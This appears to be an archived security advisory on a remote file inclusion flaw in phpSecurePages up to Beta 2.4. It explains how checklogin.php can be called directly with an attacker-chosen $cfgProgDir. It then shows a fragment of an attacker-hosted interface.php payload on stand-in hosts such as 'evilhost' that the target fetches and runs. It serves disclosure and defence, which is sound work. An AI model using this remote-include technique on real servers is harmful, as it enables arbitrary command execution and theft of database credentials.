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phpSecurePages remote command execution vulnerability



    Versions up to and including Beta 2.4


    Following is based on  a Secure Reality Pty  Security Pre-Advisory
    SRPRE00002 and Security Advisory #9 (SRADV00009).   phpSecurePages
    is a  very easy  to use  tool for  password protecting portions of
    websites on PHP enabled webservers.

    In versions specified phpSecurePages  makes insecure calls to  the
    PHP function include().   Installations of the versions  specified
    are vulnerable to attacks in which the attacker gains the  ability
    to execute arbitrary commands (and code) on the remote web  server
    with the permissions of  the web server user,  typically 'nobody'.
    phpSecurePages  can   be  configured   to  use   a  Database   for
    authorization  information,  in  this  case  the  remote   command
    execution  vulnerability  can  be  used  to read the configuration
    files and disclose the database credentials therein.

    Note that this description will be best understood in  conjunction
    with paper "A Study In Scarlet - Exploiting Common Vulnerabilities
    in PHP Applications" which can be seen from


    phpSecurePages is designed  to be an  easy to use  way to password
    protect portions  of websites.  In order  to protect  a particular
    web  page  using  phpSecurePages  the  administrator needs to make
    that page parseable by php  (usually by giving it a  specific file
    extension, often '.php')  then put on  line of PHP  code into that
    page which looks like the following:

        <?php include("<path to phpSecurePages>/secure.php"); ?>

    The include statement  is used to  cause PHP to  read a particular
    file  and  interpret  its  contents  at  PHP code.  The above line
    reads  in  the  phpSecurePages  code  and  executes  it  (when the
    restricted  page  is   accessed),  the  code   in  turn   performs
    authentication etc.

    The  problem  in  the  phpSecurePages  code  is  spotted extremely
    easily with a grep of the  source.  The following line of  code in
    checklogin.php looks dangerous:

        102         include($cfgProgDir . "interface.php");

    If an  attacker can  control the  content of  $cfgProgDir they can
    provide  a  value  like  "http://my.evil.server.com/"  and   PHP's
    remote  files   functionality  will   cause  the    phpSecurePages
    application   to    request    the   interface.php    file    from
    my.evil.server.com then execute its content on the remote machine.

    So first  we need  to understand  the context  of this  call.  The
    first question  to be  asked is  the purpose  of checklogin.php in
    the  application.   Taking  a  look  in  secure.php   (remembering
    secure.php is  the file  that is  included by  other pages  to get
    phpSecurePages authentication):

         9 /****** Installation ******/
        10 $cfgProgDir =  '/~shaman/phpSecurePages/';
        11   // location of phpSecurePages calculated from the root of the server
        12   // Example: if you installed phpSecurePages on
        13   // the value would be $cfgProgDir = '/phpSecurePages/'
        14 $cfgIndexpage = '/index.php';
        ... lots of other configuration information (language, image locations etc)
        125 include($cfgProgDir . "lng/" . $languageFile);
        126 include($cfgProgDir . "session.php");
        129 // choose between login or logout
        130 if ($logout && !($HTTP_GET_VARS["logout"] || $HTTP_POST_VARS["logout"]))
        131         // logout
        132         include($cfgProgDir . "logout.php");
        133 } else {
        134         // loading login check
        135         include($cfgProgDir . "checklogin.php");
        136 }
        137 ?>

    Basically secure.php is  mostly full of  configuration information
    for  the  phpSecurePages  installation.   Once  its  set  up   the
    configuration environment it determines if the request is to logon
    or  logoff  (on  line  130)  and  based  on  that  includes either
    logout.php  or  checklogin.php.   checklogin.php  is  meant  to be
    included and  executed by  secure.php when  the request  is for  a
    logon.   This  is   the  PHP  library   files  concept,  code   is
    compartmentalized into separate PHP source files which can  simply
    be included when needed.

    As discussed in 'A Study In Scarlet' the fact that files with  non
    PHP  parsed  extensions  (e.g  '.inc')  will be returned as source
    when requested remotely has caused many people to give every  file
    a PHP parsed extension to prevent source disclosure  (particularly
    a   problem   for   configuration   scripts   containing  database
    credentials etc).  The problem  with this is that it  allows files
    that  are  never  meant  to  be  executed except in the context of
    other  scripts  to  be  executed  by  remote  attackers  in unsafe
    environments.   If  checklogin.php  is  called  directly it cannot
    rely  on  any  of  the  configuration  variables, in particular an
    attacker may set $cfgProgDir to whatever they wish.

    A hurdle  that must  be overcome  is knowing  the location  of the
    phpSecurePages  installation,  recall  that  phpSecurePages can be
    installed anywhere in the web directories and is simply include()d
    from other pages.   One interesting point  is that  phpSecurePages
    shouldn't  really  need  to  be  installed  in  a  web  accessible
    directory at all, PHP will happily include any file, not just  one
    accessible  by  the  web  server.   However  the application ships
    with,  and  needs  to  know  the  location  of  various  images it
    displays during the authentication process.  In order to make  the
    installation  and  configuration  easier  the  application is just
    unpacked  into  a  web  directory  and  is  configured to know its
    location in  the filesystem  and the  webpath to  the directory in
    which it is installed.   This means that the  URLs for the  images
    displayed  in  the  logon  process  give  away the location of the
    phpSecurePages installation, for example:

        <IMG SRC="http://vulnserver/phpSecurePages/images/cancel.gif" ...

    The  attacker  now  knows  they  can  request  checklogin.php from
    http://vulnserver/phpSecurePages/checklogin.php.   To exploit  the
    vulnerability the  attacker simply  needs to  point the cfgProgDir
    variable at a web path they can control (a free provider would  be
    fine) and create  the file interface.php  on that webserver.   Its
    content  would  be  requested  and  executed  by  the   vulnerable
    installation  of  phpSecurePages.  For  example the attacker might
    place the following content in interface.php on http://evilhost/:

                // PHP code to be executed
                $phpcode = '
                        echo("Hi there!<BR>");
                // If we were called via remote include, send the code to be
                // executed
                if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")
                        echo("<?php $phpcode ?>");
                // Otherwise we're being executed on the target web server already,
                // so simply evaluate the code

    (This script is designed  so that the server  it is placed on  can
    be PHP enabled and  not result in the  code being executed on  the
    attacking machine)

    The attacker  could then  make the  following request  to have the
    PHP code above retrieved and executed:


    As always with PHP there  are many caveats to the  attacks details
    in this advisory based on PHP configuration and version.
    - The remote web server must be able to retrieve the file, i.e  no
      firewalls in the way
    - The  remote web  server must  not be  running PHP  under windows
      since remote file includes are not supported on this platform
    - The remote web server must not have allow_url_fopen set off


    Later versions  of phpSecurePages  correct this  problem.   Please
    download a version above 1.0.5 from:


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